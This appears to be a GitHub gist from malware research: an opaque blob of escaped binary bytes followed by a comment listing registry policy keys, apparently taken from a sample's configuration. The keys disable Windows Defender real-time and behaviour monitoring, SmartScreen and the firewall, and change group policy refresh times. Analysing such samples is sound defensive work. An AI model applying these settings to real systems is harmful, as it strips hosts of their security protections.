'\xf7\xd233c\xe1ul\x0f\xda\xd6\xbf\x18*"^\x1c\x05\xbe\xe8\x04\x06P\x94\xf0\xd1|\xfaz~-\xc3/\xd4J\xb3]\xde\x9adXd!I\x87\xe8\xfe]g\xf0XP\xcfbeQ\xae\x19\xd8zY}\xdc\'\xa8\xd3\xa5|\x15\x0e\xe7S\x00f\xbd\xa3\xaab^\xe1|J\xbc/\x02~\xc4J\xec\xe0rKA\x86m\xea\xc1R\x1e\x9a4B\x12pLVf\xa2\xfd3,\xca\x91\x14\x1a6=)\x11M >\xddK\xa5x\xbd\x95\x8c\x9d\xd9 \x8f\xd5c\xbf\xdfPGU\r\xfc\xd0\xc1\x15\x06l5Ex\xf2\xb1\x0cCV\xfb\x9f\x06|\x08\xcb\xa4i-:m\x92\x128N\xb9\xdaU{j\xd3\xef\xab\x89\xea\xbb\xf9\xeb\xbb\x10\xb8~lf\xc9j\xe6\xe97\xfe>\x94\x8e\x91\xf5&\xb2vt\xc9\x91/\x02\xfc\xc9bv\xa9\x85f\xa4l\xb5{\xd2\x8c\xe9\xe2\xebZ\x95\x02Q\x05\xedE\xd3\xe8\x15\xfec\xca\x80\x9a\xc6\x10\x97/\x14O\x9c\xbf\x98\xc8w\xb9\xaf\xea\x0b\x8f\xcd@!ux\x83\xd6\x12\x05\xf9Un\x12\xba\xf7\xbe@\xe4\x9f8\xfa\xf1#!\xda\xf8\x7f\xe9\xfb\x80\xc3\x7f\xbe\x98D\x92\x82\xf8\\s\x96t)\xc5\xbd\xca\x10\xf7\x8e[i\xb6\xe9\x16\x95\xdc:\x97n\x8b\x9e\x949n\xd0$\t*\xda\xf4o\xd5\xa5\x94\x01o3*\x90\nq\\FJ\xaf\x85\x81\xfc\xea\x04%\xe9\x1ev\xd9\xdcY\x95V\xd7dc\x86]\xcct\xc2&t\xb9*\xde]\xda\x9f\x8e%\xadwD\x7f!\xb5V`\x93\xc8\x98P@\x11\xf5I-O\xa7\xe3&\x83J\x15\x8d\xfb\xe5.\x0c\xf2}N\xe80J\xf15}\x15H\x83\x13\x14\xbe\x02\xae\x9c\x85\xa1d\xc9#\xc1\x10(\xfc\x1d\xc0'




@sysopfb
Copy link
Author

sysopfb commented Jul 11, 2022

Reg block related to security services keys

SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTimeDC;
SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTimeOffsetDC;
SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTime;
SOFTWARE\\Policies\\Microsoft\\Windows\\System;GroupPolicyRefreshTimeOffset;
SOFTWARE\\Policies\\Microsoft\\Windows\\System;EnableSmartScreen;
SOFTWARE\\Policies\\Microsoft\\Windows\\System;**del.ShellSmartScreenLevel;
SOFTWARE\\Policies\\Microsoft\\Windows Defender;DisableAntiSpyware;
SOFTWARE\\Policies\\Microsoft\\Windows Defender;DisableRoutinelyTakingAction;
SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection;DisableRealtimeMonitoring;
SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection;DisableBehaviorMonitoring;
SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet;SubmitSamplesConsent;
SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet;SpynetReporting;
SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile;EnableFirewall;
SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile;EnableFirewall;

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment